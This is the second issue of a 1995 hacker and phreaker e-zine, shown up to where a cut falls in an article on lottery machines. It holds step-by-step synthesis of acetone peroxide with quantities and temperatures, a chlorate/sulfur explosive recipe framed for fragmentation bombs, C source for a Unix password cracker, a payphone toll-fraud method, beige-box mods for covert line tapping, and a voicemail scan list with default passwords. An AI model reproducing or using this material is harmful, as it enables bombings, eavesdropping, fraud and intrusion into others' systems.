Copy Link
Add to Bookmark
Report

Ruthless Anarchists Getting Even Issue 02

  






RiSSue#2iSSue#2iSSue#2iSSue#2iSSue#2iSSue#2iSSue#2iSSue#2iSSue#2!
aS i2
GS 01110010 01100001 01100111 01100101 S#
Ei SE
#2 ÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛ uG
2# sselhtuR ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ Ruthless ea
!e stsichranA ÛÛ ÛÛÛÛÛÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛ Anarchists #R
Ru gnitteG ÛÛ ÛÛ ÛÛ ÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛ Getting 2!
aS nevE ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ Even i2
GS ÛÛ ÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛ S#
Ei SE
#2 "It's only freedom as long as the opposition tolerates it" uG
2# ea
!euSSi2#euSSi2#euSSi2#euSSi2#euSSi2#euSSi2#euSSi2#euSSi2#euSSi2#R





------------------------------------------------------------------------------
Table of Contents RaGE Magazine Issue #2
------------------------------------------------------------------------------

I. Intro
1. Welcome to RaGE #2
2. RaGE Mailroom
II. Chapter 1 [Hacking]
1. Project Hacker
2. TinyCrack C source
3. SPA/Internet Piracy
4. Mitnick Gets Busted
III. Chapter 2 [Phreaking]
1. Payphones in Spain
2. Advanced Beige Box Modifications
3. Phreaker's Tools Review
4. 1-800-325-3xxx Scan List
IV. Chapter 3 [Anarchy/Scams/Exploits]
1. Acetone Peroxide Explosive
2. Potassium Chlorate/Sulfur Explosive
3. New York Instant Lotto Machines
4. Trashing Techniques
5. Blockbuster Video Scam
6. Carding Techniques
7. Marijuana Closet Garden
V. Chapter 4 [Editorials]
1. Microsoft Windows '95 Editorial
2. Stumble's Nazi Views
VI. Ending
1. Submission Guidelines
2. uuDW group info

------------------------------------------------------------------------------

Welcome to RaGE #2, as you can see this is nothing like our first issue.
We have a new text reader for the 'zine and new ANSI. We received lots of
feedback after the initial RaGE release. Many of the suggestions and comments
sent to us influenced us into making some dramatic revisions. Hopefully it
doesn't suck too much...
We are continuing with the production of RaGE, full-steam ahead <choo>
<choo> therefore we are accepting your comments and suggestions for future
issues of RaGE. Due to suggestions from several readers we have sub-divided
the text into smaller bite size portions. This will allow you to quickly and
easily go to your section of choice.
A uuDW WWW page is in development. It was not ready for use at press
time. Therefore it should be up and running sometime soon. We are also
trying to obtain an FTP site to receive submissions for future RaGE releases.
So here you are about to read RaGE #2. We unfortunately could not
release it on the originally specified date. But life sucks, and we still
live it... So all of us at uuDW hope you enjoy another RaGE excursion...

--- RaGE Mailroom

From: jp4ace@netcom.com
Subject: RaGE
To: uudw@cyberspace.org
Date: Thu, 9 Mar 1995 16:16:28 -0800 (PST)

> I just got RaGE #1, and it is the BOMB man! Tha shit kix ass!! Make more
> music for it tho...
> L8rz..

Thanks for your support! However, due to the size of the music files in RaGE
#1, a decision was made to stop including music with RaGE.

We felt it did not fit in with the general concept of the magazine. We are,
however, in the process of working on a literary magazine, to include poems,
short stories, and music, which will be released sometime in the future.

---

From: iha_j@kosmos.wcc.govt.nz
Subject: Ya mag
To: uudw@cyberspace.org
Date: Sun, 15 Jan 1995 23:38:46

> Yeah, just a comment about ya mag, da Musix is fuqin awesome, anyway I
> was lookin into becoming offical distro site 4 ya mag, so reply here if
> interested...

Anyone interested in becoming a distribution site must e-mail us their
complete board information, and we will get back to you within a few days.

---

From: H-Bomb
Subject: RaGE is Phat!
To: uudw@cyberspace.org
Date: Sat, 14 Jan 1995 02:10:57

> Yo! I just wanna say to you guys that Rage #1 is all that! Your
> articles about AT&T and the bomb making shit... Aww man that is phat! The
> music is slammin too! Anyway I just wanna say that you guys obviously did a
> hella detailed job on #1 so im wondering when is #2 gonna be out? Where can
> I find it? Etc... But anyway I'm gonna go read Rage #1 over again to make
> sure I didn't miss anything!

Glad to hear you liked it... Check the FTP site listing at the end of RaGE #2.

!!!

--- Project Hacker

In RaGE #1, Grendel gave his opinions on the world of hacking and the
attitides that come along with it. I agree with him in that everyone seems
to just want to be the best, and aside from them, everyone else is lame.
There are many breeds of hackers, or at least, people who call themselves
hackers. As far as the underground world goes, I would like to offer my
opinion on the subject. If you haven't already, be sure to read Grendel's
article from RaGE #1.
The art of perfection in hacking lies in knowing exactly how far over
the edge you can safely go. Everyone's goal is to not get caught, (mostly
sparked by unnecessary paranoia) but not as many can actually achieve it.
What one must do is know exactly what you are dealing with. In this world,
knowledge is power. The more you know about what or who you are dealing with,
the better you will be able to handle yourself as you do what you want, and be
successful at it.
Setting a clearly defined goal is terribly important. Unfortunately,
it does not seem to be a high priority for many "hackers." They just want to
break into a system, fool around, and leave. Sure, there's a rush, but often
it's only temporary because proper measures were not taken in advance. What
they should do instead, is break in, maintain a low profile, learn the system,
find out what they can and can't do, and leave without being detected. Then,
if they want to attack the system in a more agressive way, they will have the
know-how to do so successfully, without a System Administrator breathing down
their back.
Many hackers take the same routes that have already been used and abused
by their predecessors. Here is where the power of originality can be helpful;
finding a virgin system will benefit you in many ways. There will be pathways
available to you that have never been touched by others, there will be a
number of possibilities waiting for you, tempting you with its own stupidity.
Reach out and command these untouched security mishaps, for they will be gone
all too quickly.
By breaking into a system once, you have found that a door is open to
you. By giving away your presence, you can have that door slammed in your
face. By taking careful precautions, you can not only keep that door open to
you, but open additional doors for your use.
If you like to break in and do as much damage as possible on the first
chance you get, your poor approach to hacking will soon catch up with you. If
you hack to gain knowledge, and use that knowledge in a way that will bring
you to additional knowledge, more power to you.
I would like to share an article that I recently saw in the newspaper...
Apparently, the technique being described is an old one, but has just recently
been exploited, and on quite a large scale.

---

"Internet hackers steal a new ride"

Hackers are circulating and using a technique that can crack security
systems at many Internet computer sites, including beefed-up systems recently
installed at great expense by hundreds of businesses and other institutions,
federal officials and security experts said (Monday).
Spoofed: IP spoofing can enable intruders to take control of those
systems - reading mail, deleting files or stealing programs - despite so-
called "firewalls" that were intended to improve the loose security inherent
in the Unix operating system of most Internet computers. Unix is a popular
operating system for computers at academic institutions.
Snooped: The problem will have little impact on the average Internet
computer user, whose e-mail and files have always been vulnerable to
determined snoops. But it could slow the rush to transfer cash and set up
electronic businesses on the Internet, a network on 20 million computer users.
Warned: The Computer Emergency Response Team, the federally funded
clearinghouse for Internet security, (Monday) issued a warning over the
Internet about the intruder problem and offered several possible technical
fixes, all intricate.

- (From: News Service Reports)

GraveDigger/uuDW

---

/*

TinyCrack v1.0 by Bluesman@cyberspace.org 1/95

- SPECIAL RaGE RELEASE! -

If your tired of having to use gigantic password crackers for a quick-fix,
then you might try using this program. It does the basics. It scans for
nulls, tries usernames and account names and of course it runs with any
wordlist dictionary. Tested on SunOs, Ultrix and Linux.

TO COMPILE: gcc -O2 tc.c -o tc
*/


#include <stdio.h>
#include <string.h>

#define fetch(a,b,c,d) {fgets(a,130,b); c=strtok(a,":"); d=strtok('\0',":");}

main()
{
FILE *p,*o,*w;
char i[50],pes[130],pas[50],pps[50],pws[50];
char *es=pes,*as=pas,*ps=pps,*ws=pws;

printf("\nTinyCrack v1.0 Bluesman 1/95 - RaGE Mag Release!\n\n");
printf("Password File: "); gets(i);
p=fopen(i,"r");
printf("WordList File: "); gets(i);
w=fopen(i,"r");
printf("Results File : "); gets(i);
o=fopen(i,"w");

fprintf(o,"*** TINYCRACK v1.0 ***\n\n*** PASS 1: NULL PASSWORDS ***\n");

while(ps)
{
fetch(es,p,as,ps);
if(ps) if(ps[-1]==':') fprintf(o,"| User [%s] has no password!\n",as);
}

fflush(o); rewind(p);

fprintf(o,"*** PASS 2: ACCOUNT NAMES ***\n");

do
{
fetch(es,p,as,ps);
if(ps) if(!strcmp((char *)crypt(as,ps),ps))
fprintf(o,"| User [%s] has password [%s]\n",as,as);

} while(ps);

fflush(o); rewind(p);

fprintf(o,"*** PASS 3: DICTIONARY WORDS ***\n");

do
{
rewind(w);
fetch(es,p,as,ps);

do
{
fgets(ws,130,w);
ws[strlen(ws)-1]=0;

if(!strcmp((char *)crypt(ws,ps),ps))
{
fprintf(o,"| User [%s] has password [%s]\n",as,ws);
fflush(o);
break;
}

} while(!feof(w));

} while(!feof(p));

fprintf(o,"*** FINISHED SESSION ***\n");
exit(1);

}

--- Internet Piracy

Piracy has been a big issue in on the Internet since the crackdown of
Cynosure in the middle of 1994. With that bust many different communities
have been working together to stop the pirate situation on the Internet. It
has been a constant race between the pirates and the anti-pirates. When the
anti-pirates find one way to stop them, the pirates find another way around
them. But as the following article states, the Internet is going to be a huge
target in 1995. Please read the material and take precaution toward these
actions. This is a fair warning going out to the anti-pirates, and the
pirates...

---

SPA Targets Internet, International Piracy 01/11/95

WASHINGTON, D.C., U.S.A., 1995 JAN 11 (NB) -- Software Publishers
Association (SPA) says corporate software piracy in the US was down 23 percent
in 1994, but other forms of piracy became more secretive and harder to locate.
The anti-piracy trade organization said it will focus on international piracy
and, specifically, piracy on the Internet during 1995.
SPA sources said anti-piracy hot-line calls came in last year at a rate
of nearly 30 per day. These tips led to the SPA taking various types of
action against 447 organizations and led to 197 audits and lawsuits. These
resulting in the payment of $2.7 million in penalties during 1994, SPA sources
said. The organization said cumulative receipts from its continuing anti-
piracy campaign came to $14 million so far at the end of last year.
SPA said that, of all cases brought against suspected offenders, 95
percent were corporate cases. Five of these led to settlements greater than
$100,000, the organization said. Money from such settlements goes to fund
education programs and future legal actions, the SPA said, but declined to
name any of the companies involved.
The SPA officially estimates losses to software companies at $1.6 billion
annually in the US, and $7.5 billion internationally. It bases its estimates
on the number of computers sold in an area, the number of software packages
reported sold legitimately in the same area, and statistical reports on the
number of key applications run on an average desktop machine.
David Trendlay, the SPA's director of research, told Newsbytes the
underlying assumptions were reasonable and the resulting estimates should be
considered good.
Sally Lawrence, the SPA's director of communications, told Newsbytes that
piracy law violators have become more active on the Internet, where they
are harder to track down.
"We have stepped up our monitoring on the Internet dramatically, and are
working in cooperation with major American universities where some of this
activity is taking place,"
she said during an interview. "They've come across
a number of pirate sites hidden away in unsuspecting host servers. Right now
they're monitoring those activities with the intention of prosecuting to the
full extent of the law."

Lawrence declined to release any further details, other than to confirm
that the organization's attentions to the Internet were not confined to
activities in the "found" specific sites.
Internationally, the SPA has been active in France, Great Britain,
Singapore, Ease Asia, South America and Canada. It has recently developed a
Certified Software Manager course that offers certificates upon completion of
a test on copyright law, licensing issues, autoing and software management
policies.
(Craig Menefee/19950111/Press Contact: Sandra Sellers, director of
litigation, ext. 311, or Sally Lawrence, director of communications, ext. 320,
both of the Software Publishers Association, 202-452-1600; Reader Contact:
Piracy Hotline: 800-388-7478; SPA fax-back service, 800-637-6823)

---

MrOrange/uuDW

--- Mitnick: NO CARRIER

Kevin Mitnick, the computer hacker who has been dodging the law since
1992, was finally caught in February 1995. His downfall was the result of
another hacker's work, who happened to be on the other side of the law.
Tsutomu Shimomura was able to locate Mitnick's exact location through
several tracking techniques, including assistance from a Sprint technician,
who drove around Raleigh, North Carolina, in a van equipped with cellular
frequency scanning equipment.
In the early 1980's, Mitnick was a teenage phone phreak, and later became
involved in computer hacking. He stepped up from payphones to cellular
technology, giving him even more freedom.
Mitnick had collected some 20,000 valid credit card numbers, but had not
even used one of them, according to the evidence available.

(This article was condensed from the February 27 1995 issue of Newsweek.)

GraveDigger/uuDW

!!!

--- Spanish Phone Phun
By: Greg Oreck (i think?!)

<I've cut out a long un-needed disclaimer - Grendel>

While I can describe to you how one could accomplish this little hack,
I'm still looking for a definitive answer as to why it works, so if anyone
else has any ideas, please let me know. As far as I can tell though, what the
following does is to give you a line out from inside the Telefonica
system itself, and probably directly out of their telephone directory
information lines.
To start off, first you have to find the right kind of phone. The phone
you see here is the ONLY kind of Telefonica pay phone this works on, this
hack utilizes some flaws in this particular kind of pay phone, which only one
of the types found in Spain. It would be interesting to know if there are
Telefonica phones such as these in other spanish speaking countries (as I
believe Telefonica doesn't only operate in Spain).
Aside from just finding the right kind of pay phone, you also need to
find one where the wall plug is within reach, and where it is possible to
tamper with without attracting to much attention. This isn't as hard as you
think! Very often the plug is directly below the pay phone itself (as
pictured here).

<Here is my lame re-creation of a really cool picture - Grendel>

___________Slot_____
/ \
| ----- |
| /-\ | LED | |
| \_/ ----- | Notes:
| [|] mf ? | The coin slot is right above
| [|] 1 2 3 | the LED display. I have no idea
| [|] 4 5 6 | what the "mf" button stands for,
| [|] 7 8 9 | but as you'll read later on, it's
| /-\ * 0 # | an important ingredient! The
| \-/ _______ | button labeled "?" is the button
| |Coinbox| | I couldn't make out from the
| |_______| | picture... Below the phone is the
|--------------------| plug. Boy they sure are dumb in
\____________________/ Spain! Oh yeah: The "Coinbox" is
|Plug!| the coin return. - Grendel
|_____|

Now to begin, deposit one 25 peseta piece into the phone (the large 25
peseta piece, not the new small one). Next, press down the hook nine-tenths
of the way down until you feel a little resistance. If your 25 pta. piece is
returned, you pushed it down too far, but if it doesn't, and the LED screen
changes and starts to blink then you've done it correctly.
Now it would be wise to place something over that LED screen as the
blinking picture on the screen means that the phone is now working and anyone
who glances at it during your call will get quite suspicious. I suggest a
business card with someone's phone number on it (as if you were using it to
look at their number).
Once you've done this, you should dial "003". This is the # for
directory assistance in Spain, and once it connects, you will at first get a
recording in spanish. Once you hear this (i.e. you've connected), quickly
unplug the phone from the wall and then reconnect it.
At this point you should hear a steady tone (this is their dial tone),
and all you have to do now is to hit the "mf" button on the phone's keypad
(this is usually used for if you want to make a second phone call and still
have credit for the last call). Once you've hit the "mf" button, you're free
to dial away! You can now make local or international calls, just consult the
directions on how to make international phone calls from any outdoor phone
booth.
To make another call when you're done, instead of hanging up, just unplug
and re-plug in the phone again and hit the "mf" button and you're ready to
dial again!
Finally (and this is the best part!) when you are done with your phone
calls, just hang up the phone, and your 25 pta. piece is returned to you!
(courtesy of your friends at Telefonica!)

Hope you enjoyed the information!

* A note from Grendel: I stole this article out of "Walkabout 'zine" a really
cool 'zine that I picked up at a music/comic/coolshit shop up near the local
University. I recommend that if you see this 'zine sitting on some shelf...
BUY IT! (Or steal it.) Whatever!

Grendel/uuDW

--- Beige Box Modifications

I'm going to try to explain, and provide text-diagrams for a few
modifications I have made to my beige box. These modifications allow for
greater manipulation and testing of the lines which you will be using during
your boxing experiences. They have been streamlined with the idea in mind
that a beige box is a tiny hand-held unit, and these additions should not add
too much bulk to your box if you decide to implement them.
This article is assuming you know what a beige box is. I will not
explain how to build one here. This is only meant for people who already
have one, and who have used it before. I've provided the info, use it as you
wish. Do it right, and you'll have no problems.
You should be able to find all the parts you need in a decent electronics
store. I usually get my stuff from Radio Shaque, but I also got some from
school -- I used to take an audio electronics course, and I was able to get
lots of components from that class. Adding these modifications involves some
knowledge in stripping wires, identifying components, and soldering. If you
can't do any of this, here is a good place to stop.

1. Line Breaker:

One of the devices on my beige box is just a simple button. It's a
normally-closed button, which means the circuit is on unless you press the
button, which will break the circuit. Pushing this button, then, is the
equivelant to hanging up the phone. I hold this button down when connecting
the clips to the terminals, just in case someone is on the phone. This will
prevent them from hearing static and such. It can also be used to quickly
disconnect modem calls without removing the alligator clips. Below is a
simple diagram showing how to add this feature to your beige box:

Modular Jack
+----------+ Green Wire
| |----------------------------< Alligator
| |-----------------+ +-----< Clips
+----------+ Red Wire | |
+-//-+ Button or SPST Switch

All of the parts are self-explanitory, and the button could be replaced
by an SPST toggle switch if desired. As shown above, the button or switch is
placed on one wire (either red or green would work, it just has to be able to
interrupt the circuit) and each end of the wire is attached to one of the
terminals on the button or switch.

2. Polarity Tester:

This is helpful for testing for lines when you aren't sure if any of the
terminals in a box are actually connected, or if you can't remember the famous
"RED RIGHT RING" rule, and want to be sure you connected the box the right
way. It's activated by an SPST switch, and also requires a red and a green
LED. These parts are easily obtainable from most electronics stores. You
can even buy them if you want, but I suggest "obtaining" them first. (Why
waste your money?!) Here we go with lame diagrams again:

Green Wire
---------+---------------------<
|
/ SPST Switch
|
+-+-+
- | | +
Red LED @@ @@ Green LED
+ | | -
+-+-+
|
---------+---------------------<
Red Wire

Take note that the polarities of the LED's are opposite each other. This
way, if the current is flowing, only one LED will light up, indicating if the
polarity is correct or not. If no light is on, either there is no current,
the LED's are blown, or you fucked it up somehow. You should only use this in
emergencies, and only for short periods of time, or else you will blow the
LED's, and the damn thing won't work, you will look like a major
lamer if you're out with someone else and the thing fails. :P
Normally, the red wire is the negative end. So you need to make sure
you have the green LED's negative end facing the red wire, and the red LED's
negative end facing the green wire. Otherwise, the thing won't report the
correct polarity, and what purpose would that be?

3. Line Noise Reducer:

By adding this modification to your beige box, you will be able to cut
line noise. This is another simple procedure which requires easily-obtainable
parts. It will not reduce all of the noise, but can be effective to some
degree. The diagram follows:

Green Wire
------+---------------------<
|
(O) 1k ohm resistor
|
(O) 1k 250v capacitor
|
------+---------------------<
Red Wire

The capacitor will trap any excess noise, and the resistor will prevent
it from doing too much work. This should not affect the quality of the
connection in a negative way. These parts are also easy to get, just try to
get small components so you can fit them inside the modular jack. This actual
modification idea was borrowed from a text file on reducing phone line noise.

4. Monitor/Talk Mode Switch:

This method has not been tested by me, and it has been devised from an
article written by Phucked Agent 04 from the LOD/H Technical Journal. I'm
including this because I don't think many people know about this.
The purpose of this device is to allow you to monitor someone's line,
meaning just sitting there and listening in, or to use the line for dialing,
modeming, talking or whatever. This switch, then, is like a mute button.
Follow carefully for a little lesson in parallel circuits.

Red Wire
----------------------------< Alligator
------------+ +------< Clips
Green Wire | |
+---//---+ SPST Switch
| |
+---@@---+ 10,000 ohm 1/2 watt Resistor
| |
+--! (--+ 0.22 uF 200 WVDC Mylar Capacitor

Lovely, is it not? Hmm... Oh, that's what I thought. Anyways, to talk,
simply close the switch. Thus all the current will travel normally, bypassing
the capacitor/resistor routes. By opening the switch, you send the current to
the cap and resistor, placing you in "monitor" mode, in which anyone using the
line will not be able to hear you. If you want to get really sneaky, replace
the SPST with an on/off trim pot, which will enable complete cutting of the
circuit and complete connection. This will allow you to gradually switch
modes, as to further go undetected due to the absence of audible line static
due to your dirty deeds.

Well, there's a few ideas on how to improve your beige box. What I did
was to cut holes in the top of the modular jack case to house the button,
switch, and two LED's. The resistor/capacitor fit inside. Most buttons and
switches come with nuts or screws to fasten them to the case. For the LED's
you can use glue to secure them in their place. When adding these toys, use
the smallest amount of copper wire possible, and be sure to solder all your
connections. If the damn thing falls apart, its likely to be a bitch to fix
it. Do it right the first time.
If you're messy and can't make everything fit right, either get a bigger
modular jack or one of those "experiment boxes" from Radio Shaque, a small
plastic box which can be used to house your various components. If you decide
to do this, instead of using a modular jack, just get a small modular socket
and wire it yourself. Have fun, and be eleet!!

GraveDigger/uuDW

--- PC Phreakers Tools Review

I am going to review some high points and low points of two of my
personal favorite software products designed for phreaking purposes. They
are available on various FTP sites, or just call up any decent H/P/A board and
look for copies. If you can't find 'em you probably don't need 'em.
These programs are ToneLoc and BlueBEEP. I used the most current
versions at the time of writing this article. BlueBEEP is one release short
of its last version, and I'm not sure about the future of ToneLoc. In any
event, on with the show.

ToneLoc 1.10 - Minor Threat & Mucho Maas

This is, in my opinion, the best scanning program available for the PC
phreak. The version I currently have is 1.10, and I have used it on several
occasions, without running into any noticeable errors.
My first impression of ToneLoc was "I hate commandline-driven dialers!"
I was hoping to encounter some kind of scanning interface. But out of
necessity, I finally gave ToneLoc another try and decided there was no better
substitute. Even though it is commandline-driven, its features are powerful,
allowing you to define the scan mask, range, hours, maximum numbers dialed,
and more. It comes with a config program, which is used to define the modem
port, init strings, dialing times, modem responses, and other important
settings. However, well... Most BBS programs don't even have external config
programs anymore. This makes operation a little clunky in my opinion.
One of my friends reported that his 28.8 didn't work with ToneLoc, and
when recommending ToneLoc to me, suggested that I use my 2400 for scanning. I
decided to tinker around with TL first, to see if I could get my 14400 to
work properly with it. All I had to do was add some delays to the hangup
strings, modify the dialing time, and add commands to the init string. It
took less than 5 minutes of configuring, testing, and reconfiguring until my
14400 was set up properly.
During my setup, I also discovered how well the authors have documented
their software. After scanning 1000 numbers, I got 4 carriers, 15 busy
signals, and the rest in timeouts. I was a little disappointed. What to do
about all those damn timeouts? Then, I noticed another program in my TL
archive that was designed to handle the timeout responses. This particular
program was TLREPLAC, written by the TL authors themselves, and is very
useful. Unfortunately, the data file entered on the commandline for TLREPLAC
must have the .DAT extension, as the extension you enter is ignored. I had to
rename my datafile in order to use this utility.
While scanning, you are shown the modem responses on the right portion of
the screen. This is helpful when setting up, as you can see if the init
string gives an error. You also have the option to turn off the modem speaker
from the scanning screen, as well as blank the screen, show a different screen
(boss-key type feature), and stop the dialing prematurely.
TL 1.10 also came with third-party utilities designed to work with its
output data files. The authors of TL have included their C header file, which
explains the format of the data files, for anyone wishing to develop
complementing software. One of these third-party utilities is Tonemap, which
displays a graphical map with color representation of the various scanning
results from your data file. Using the cursor arrow keys, you can move to
different-colored blocks quickly, and the number will be displayed on the
screen. For example, carriers are red blocks, so you can quickly see them,
and move the cursor to the box and get the number, instead of just opening up
the scan log text file and getting the number.
Another of the external utilities is PRESCAN, allowing you to exclude
certain numbers in your scanning range. These numbers could be residential
numbers obtained from the phone book, and there are supposedly CD-ROM disks
available with such numbers on them, which can be used and will make your job
easier. In effect, this cuts down your scan time by not dialing numbers that
you know won't be of any use to you.
I think it would be great if ToneLoc came with default setups for
different brands of modems, like many terminal programs come with. Due to
TL's large user population, it shouldn't be hard to get help to develop this
addition if it is planned.

BlueBeep .10 - Onkel Dittmeyer

This little gem has an array of great features. It works best with a
soundcard. You only need a modem if you want to do scanning with it, but I
really recommend ToneLoc as a scanner. Included with BB is a redbox tone
generator, card talker, and a number/word translator.
You can setup everything from within BB, including the soundcard, modem,
and other settings. With the setup being internal, it makes things that much
easier.
My personal favorite tool is the Card Talker. It allows the user to
define a phone number, a calling card number, and use pre-recorded voices to
use as an interface between the phreak and the Long Distance Operator. This
feature was designed so well, the voice samples for the numbers includes a
"high" and "low" sample, giving it a natural sound, since numbers at the end
of a grouping would naturally be spoken with a lower tone of voice.
The Card talker also has user-defined voice capabilities, allowing two
VOC files to be inserted by the user. I think it would be best to add more
user-defined VOC slots, to allow for greater possibilities. For example, you
might need a voice to say "Yes," "No," or other responses. Also, it would be
helpful to have a short definable description for each custom voice file, so
you know which button is which voice. Pressing the key for the included voice
"Hey you stupid fag, I'm gonna cut your balls off" could be the wrong thing to
do after the operator tells you she is putting your call through.
The number/word convertor allows you to type in a word and have it
translated to numbers as you would find on a touchtone phone. It also allows
you to type in a number and instantly find a matching word or phrase for it.
This is handy for scanning those word-numbers like 1-800-EAT-SHIT or similar.
Due to a phone's layout though, it can't convert numbers with 0 or 1 in them,
since there are no matching letters.
There are also many scanning routines to be used, none of which I have
tried due to my desire to stick with ToneLoc for scanning. Even still, BB is
not a command-line scanner :). However, if I ever had one of those recordable
talking hallmark cards, I would know where to record my redbox tones from.
I recently mailed the author of this program to ask a question about
the program itself, and the author informed me he is preparing to release the
source code and discontinue work on the program. I have also heard on Usenet
that the author is planning one final release - 1.00 - after which release
the source will be made publicly available. This should be a great help to
anyone interested in developing a phreaking utility for the PC.
You can also expect a uuDW project to come out of BlueBEEP. Right now,
we are planning a customized version of BB's card talker, and we are going to
use the BlueBEEP source to develop it. Watch for it soon.

GraveDigger/uuDW

--- 1-800-325-3xxx Scan

011 - VMB System (VMX)
024 - VMB System
033 - "Please enter your transaction code and password."
040 - VMB System (Audix)
042 - VMB System (Audix)
047 - VMB System
053 - VMB System
057 - "Please enter your 4-digit PIN"
061 - VMB System (VMX)
070 - Loud Beeps (Fax? - Press * or #)
073 - VMB System
090 - Dictation Service <?> Asks for access code

102 - "Please enter your 4-digit PIN"
104 - "Please enter your 4-digit PIN"
105 - "Please enter your 4-digit PIN"
107 - "Please enter your 4-digit PIN"
116 - "Please enter your 4-digit PIN"
120 - VMB System
125 - VMB System (Admin box 999)
130 - VMB System
134 - VMB System
137 - "Please enter your 4-digit PIN"
138 - "Please enter your 4-digit PIN"
139 - "Please enter your 4-digit PIN"
151 - "Please enter your 4-digit PIN"
176 - VMB System (* to enter a mailbox) (no hangup for errors)
188 - VMB System

201 - VMB System (Aspen) (Admin box 9000)
215 - Carrier
219 - VMB System (Automated Attendant)
222 - VMB System
236 - "Please enter your 4-digit PIN"
239 - Weird tones (similar to a carrier)
243 - Carrier
250 - Automated Banking Service
251 - VMB System (#81 to access)
281 - Weird beep - Press # and * and it says "Hang Up."
286 - Weird beep - Press # and * and it says "Hang Up."
292 - VMB System (Automated Attendant) (3 digit boxes, 4 digit passwords)

322 - VMB System (default password: 0000)
341 - Weird beep - Press # and * and it says "Hang Up."
350 - VMB System
356 - VMB System
367 - Quiet tones
377 - Asks for a 5 digit access code
381 - VMB System (Dial ##81 to logon)
382 - Long Beep
391 - VMB System (Dial ##81 to logon)
393 - VMB System
398 - VMB System (4 digit boxes, 10 digit passwords)

402 - VMB System
405 - VMB System
411 - Direct-dial VMB / Pager Service
422 - VMB System
446 - VMB System
458 - VMB System
472 - VMB System
480 - VMB System (Press *# to enter) (3 digit boxes)
492 - Carrier

505 - Dialout (Code needed)
508 - VMB System
519 - VMB System
523 - VMB System
530 - Weird tones
540 - VMB System (3 digit boxes/passwords)
545 - VMB System (3 digit boxes/4 digit passwords)
550 - VMB System
552 - VMB System (Meridian Mail) (Press #6 to enter)
565 - VMB System (Meridian Mail) (Press #1 to enter)
573 - VMB System (#81 to enter)
590 - Automated Banking Service

644 - VMB System (3 digit boxes/4 digit passwords)
645 - Carrier
680 - Weird Beeps
690 - Carrier

716 - "At the tone, please key in your number"
720 - Weird Beeps
727 - Ringing with dialtone heard in background
785 - Rings Once.. beeps heard after ring
799 - (After pressing #, "Please enter your security code")

805 - Beep then rings.. VMB System
811 - VMB System (prompts for password then mailbox)
815 - VMB System (Press *# to enter)
841 - VMB System
847 - "..this program has ended and no further calls are being taken.."
856 - Long high-pitched tone
864 - VMB System
885 - Dialout
888 - VMB System

929 - "Enter the numbers you wish displayed"
936 - VMB System
963 - Automated Trucking Accounting Service
969 - Automated Trucking Accounting Service
980 - Press # "Please enter your.. access code"

!!!

--- Acetone Peroxide Explosive

Acetone peroxide is a primary explosive that can be made from hair
bleach (hydrogen peroxide), acetone, and sulfuric acid. This explosive can be
used n the fabrication of detonators.

Material Required: Sources:

Hydrogen peroxide Hair bleach (15-25 volume content)
Drug stores and hair supply stores.

Acetone Hardware stores, drug stores, etc.

Sulfuric acid Clear battery acid boiled until white
fumes appear.

Eye dropper or syringe with
glass tube.

Graduated cylinder (cc or ml) or
other measuring device.

Thermometer (0 to 100 degrees C.)

Glass containers

Large pan

Ice, salt and water.

Paper towels

Procedure:

1. Measure 30 milliliters of acetone and 50 milliliters of hydrogen peroxide
into a glass container and mix thoroughly.

2. Cool the acetone/peroxide mixture by placing its conatiner in a larger one
containing a mixture of ice, salt, and water.

Note: Because of the lighter inner container being buoyant in the larger
outer container, it's necessary to secure it so that it won't fall over into
the ice, salt, and water mixture.

3. Cool the acetone/peroxide mixture to 5 degrees C.

4. Add 2.5 milliliters of concentrated sulfuric acid to the acetone/peroxide
mixture slowly, drop by drop, with the use of an eye dropper. Stir the
mixture during the addition of the sulfuric acid with a thermometer,
keeping the temperature between 5-10 degrees C. Should the temperature
rise above 10 degrees C., stop adding the sulfuric acid and continue
stirring until the temperature drops again to 5 degrees C., then continue
adding the sulfuric acid.

5. After all the sulfuric acid has been added, continue stirring the mixture
for another five minutes.

6. Let the acetone/peroxide/sulfuric acid mixture stand in the ice/salt/
water bath or remove the inner container and place it in an ice box for 12
to 24 hours.

7. After 12 hours white crystals of acetone peroxide will precipitate out of
the once clear solution. Precipitation should be completed after 24 hours.

CAUTION: At this point the mixture is a primary explosive. Keep away from
shock, friction and flame.

8. Filter the mixture through a paper towel into a container to collect the
solid particles.

9. Wash the solid particles collected in the paper towel with small amounts
of ice cold water poured over them. Discard the liquid in the container.

10. Place these explosive crystals in a container and allow to dry.

CAUTION: Handle the dry explosive with great care. Do not scrape or handle
it roughly. Keep away from sparks or open flame. Store in a cool, dark, dry
place.

PSYC0SiS/uuDW

--- Potassium Chlorate/Sulfur Explosive

An impact sensitive explosive can be made from postassium chlorate and
sulfur. This explosive can be used as a filler when making reusable primers
or as a filler when making impact sensitive fragmentation bombs.

Material Required: Sources:

Potassium chlorate Drug stores and chemical supply houses
(used in match heads).

Sulfur Drug stores and garden supply houses
(Flotox brand garden sulfur).

Measuring container (cup,
tablespoon, etc.)

Mixing container (jar, can) with
tight fitting lid.

Two flat boards (one should be
comfortably held in the hand such
as a square block or rolling pin
and one very large, i.e., 36" x
36"
)

Procedure:

1. Spread a handful at a time of postassium chlorate on the large flat board
and rub vigorously with the other flat board or rolling pin until the large
particles are crushed into a very fine powder (approx. 10 minutes per
handful).

CAUTION: Thoroughly clean and dry both boards before using again with a
different substance.

2. Repeat this process using the sulfur.

3. Measure 7 parts by volume, 11 parts by weight, of powdered potassium
chlorate and 1 part by volume, 1 part by weight, of powdered sulfur into
the mixing container.

CAUTION: This mixture forms an extremely shock sensitive explosive,
especially between two metal surfaces. Reasonable care should be exercised
from this point on.

4. Gently tumble the mixing container between the hands until the ingredients
are thoroughly mixed together.

5. Place the mixed explosive in a tightly sealed storage container until
ready to use.

CAUTION: Do not store the mixed explosive for more than five days before
using. Keep this explosive dry at all times.

PSYC0SiS/uuDW

--- Ripping Off Instant Lotto Machines

New York's prominant "Hey, you never know..." theme for the lottery may
be a common saying these days, but the odds of your winning any state lottery
are quite slim; or are they?
First off, I'd like to throw a standard disclaimer at you: I'm not
responsible for shit. My intentions are not to cause financial difficulty to
the states (God knows we need more of it), but merely to point out some
